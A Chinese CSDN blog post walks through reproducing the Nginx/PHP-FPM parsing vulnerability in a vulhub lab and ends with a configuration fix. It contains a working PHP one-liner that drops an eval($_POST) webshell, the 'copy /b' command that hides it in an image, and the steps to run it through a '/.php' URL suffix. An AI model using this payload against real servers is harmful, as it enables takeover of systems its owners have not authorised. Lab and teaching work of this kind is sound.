复现Nginx 解析漏洞

最新推荐文章于 2024-07-12 15:51:39 发布
最新推荐文章于 2024-07-12 15:51:39 发布
阅读量881 收藏 1
点赞数
分类专栏: 复现漏洞 Linux Nginx 文章标签: nginx php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59280309/article/details/130393892
版权
Linux 同时被 3 个专栏收录
32 篇文章 0 订阅
订阅专栏
复现漏洞
7 篇文章 0 订阅
订阅专栏
Nginx
5 篇文章 0 订阅
订阅专栏

目录

漏洞原理

漏洞复现

编译环境

制作图片马

一:随便弄一张图片

二:准备写一个.php文件,写上木马

三:合成图片马

上传图片马

修复漏洞

漏洞原理

1、 由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。

2、但是fastcgi在处理’.php’文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这项配置用于修复路径,如果当前路径不存在则采用上层路径。为此这里交由fastcgi处理的文件就变成了’/test.png’。

3、 最重要的一点是php-fpm.conf中的security.limit_extensions配置项限制了fastcgi解析文件的类型(即指定什么类型的文件当做代码解析),此项设置为空的时候才允许fastcgi将’.png’等文件当做代码解析。

注:限制fpm允许解析的脚本扩展名。此设置可以预防web服务器配置的错误。应当限制fpm仅仅解析.php扩展名,阻止恶意用户使用其他扩展名运行php代码。默认值:.php

漏洞复现

该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

编译环境

该环境使用vulhub搭建,该漏洞路径为 vulhub/nginx/nginx_parsing_vulnerability

直接执行docker-compose up -d启动容器,无需编译。

制作图片马

一:随便弄一张图片

二:准备写一个.php文件,写上木马

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);echo"hacker"?>');?>

三:合成图片马

copy /b 图片文件+木马文件 合成后的图片马名称.jpg

 

 可以看到,图片能正常打开

 上传到测试机中

 

上传图片马

 

成功上传

访问图片

正常显示

这时候在URL后加上/.php,让其运行php命令

会发现看不到我们写入的php命令了,但是其实是因为他已经成功执行了,这时候在uploadfiles的目录下已经成功生成了名为shell.php的文件,我们只需要访问该文件就可以了

注:

在URL后加上/.php可能会出现上图的错误信息,多试几次,换几张不同的照片重复制作图片马,会成功的

这个时候就可以打开中国蚁剑进行连接,连接成功后就可以进入到靶机内部

修复漏洞

修改php-fpm.conf的配置文件

 重启环境

docker-compose restart

浏览器再次访问加上./php的图片地址,发现被拒绝,说明漏洞被修复

参考:

https://blog.csdn.net/Tauil/article/details/125888127

https://www.cnblogs.com/yuzly/p/11208742.html

戲子 鬧京城°ぃ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
复现vulhub nginx解析漏洞
weixin_57108799的博客
03-05 156
进入nginx所在文件打开终端,然后运行sudo docker-compose up -d命令。
文件上传:Nginx解析漏洞
zh的博客
10-12 540
靶场地址:http://www.whalwl.site:8020/ 解题准备:了解Nginx解析漏洞 解题思路: 1、准备测试图片 首先做一个图片phpinfo(), .jpg上传成功,返回上传后的图片地址 uploadfiles/b5f7a062d84869fe4f3af35b79fca50c.jpg 2、浏览器访问图片地址,证明文件确实存在 3、根据Nginx解析漏洞,在地址后面添加/1.php,成功执行 4、同理上传一句话图片。 5、地址后面添加/.php,...
Nginx 文件解析漏洞复现
qq_42754807的博客
05-28 642
nginx文件解析漏洞的修复
Linux图片PHP,php检测图片(附代码)
weixin_34652847的博客
03-16 492
/**+——————————————————————————* Upload 文件上传类+——————————————————————————* @package Upload* @authorAnyon * @version $Id: Upload.class.php 2013-3-20 21:47:23 Anyon $+——————————————————————————*/c...
nginx常见漏洞解析
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作...默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持phpnginx服务器
服务器nginx常见漏洞修复
09-14
服务器nginx常见漏洞修复
Nginx相关漏洞极其预防1
08-08
Nginx 相关漏洞极其预防 ...Nginx 相关漏洞的预防需要我们从多方面入手,包括文件解析漏洞、目录遍历漏洞、CRLF 注入漏洞和目录穿越漏洞等。只有通过正确的配置和预防措施,我们才能确保 Nginx 服务器的安全。
nginx1.4.0漏洞验证
06-21
测试用到的python文件和linux版本的nginx1.4.0源码
Python解析nginx日志文件
09-22
Web服务器的各种系统管理工作包括了多Nginx/Apache 日志的统计,python使这个任务变得极其简单,下面我们来详细讲解下具体的做法,有需要的小伙伴可以参考下。
关于图片的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
图片,有木,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看一下源码吧,过关方式也是叫我们上传图片。。。 然后我还要说吗一下,图片不是一张木图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 一:准备图片 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
【2·未知攻焉知防】 如何利用SQL注入,结合图片渗透入侵服务器
胡杨林
06-06 2803
1. 概述   此文原出自【爱运维社区】: http://www.easysb.cn   SQL注入漏洞是由于对字符串的过滤不严格导致的,根据数据外带方式不同,可分为时间盲注,bool盲注,错误等等很多种。如果当前站点的数据用户是root的话,那么就会导致服务器上的所有数据库泄露,假如不是root用户话,那么泄露的数据库仅仅为当前用户有权限的数据库。但是,即便这样能够访问当前的站点数据
NGINX漏洞 整理记录
04-06 5700
简单介绍NGINX: Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。 其特点是占有内存少,并发能力强,nginx的并发能力在同类型的网页服务器中表现较好。主要应用在百度,淘宝等高并发请求情形。 漏洞: 1.NGINX解析漏洞 (1)Nginx文件名逻辑漏洞(CVE-2013-4547) 影响版本:Nginx0.8.41~1.4.3 / 1.5.0~1.5.7 漏洞原理:主要原因是nginx错误的..
记录“文件上传漏洞防御--图片的剔除”之摘抄
zhangge3663的博客
03-26 1739
一、内容       上传功能常见于图片的上传,例如博客头像设置,广告位图片上传等。        上传检测方法在paper中也写的比较明朗,这里总结一下:       1.客户端使用JS对上传图片做检测,例如文件大小,文件扩展名,文件类型       2.服务端检测,例如文件大小(免得拒绝服务),文件路径(避免0x00截断,目录遍历),文件扩展名(避免服务器以飞非图片的文件格式解析文件),文件类...
Nginx+PHP 配置漏洞:静态文件都可以当作 PHP 解析
weixin_33851177的博客
08-17 351
这个漏洞严格上说并不是 NginxPHP 本身的漏洞造成的,而是由配置造成的。在我之前写的许多配置中,都普遍存在这个漏洞。 简易检测方法:打开 Nginx + PHP 服务器上的任意一张图片,如: http://hily.me/test.png 如果在图片链接后加一串 /xxx.php (xxx为任意字符)后,如: http://hily.me/test.png/xxx.php 图...
nginx+php 上传含有php脚本的木图片文件的漏洞解决
xuyaqun的专栏
12-03 5545
http://www.80sec.com/nginx-securit.html漏洞详解解决方法:解决方案:我们已经尝试联系官方,但是此前你可以通过以下的方式来减少损失关闭cgi.fix_pathinfo为0或者if ( $fastcgi_script_name ~ /..*//.*php ) {return 403;}漏洞危险等级:毁灭性。 这个漏洞严格上说并不是 NginxPHP 本身的漏洞造成的,而是由配置造成的。在我之前写的许多配置中,都普遍存在这个漏洞。 简易检测方法: 打开 Nginx +
PHP编程开发工具有哪些?
Pythonit教程网
07-10 995
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 964
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
java版的上门家政系统和PHP版的上门家政有什么区别?
最新发布
baina666的博客
07-12 380
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
nginx中间件解析漏洞的影响
06-10
Nginx 中间件解析漏洞是指攻击者利用 Nginx 中间件解析漏洞,通过构造恶意请求,从而绕过服务器的安全措施并执行任意代码。这种漏洞可以允许攻击者在服务器上执行任意的系统命令、读取、修改或删除服务器上的敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戲子 鬧京城°ぃ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值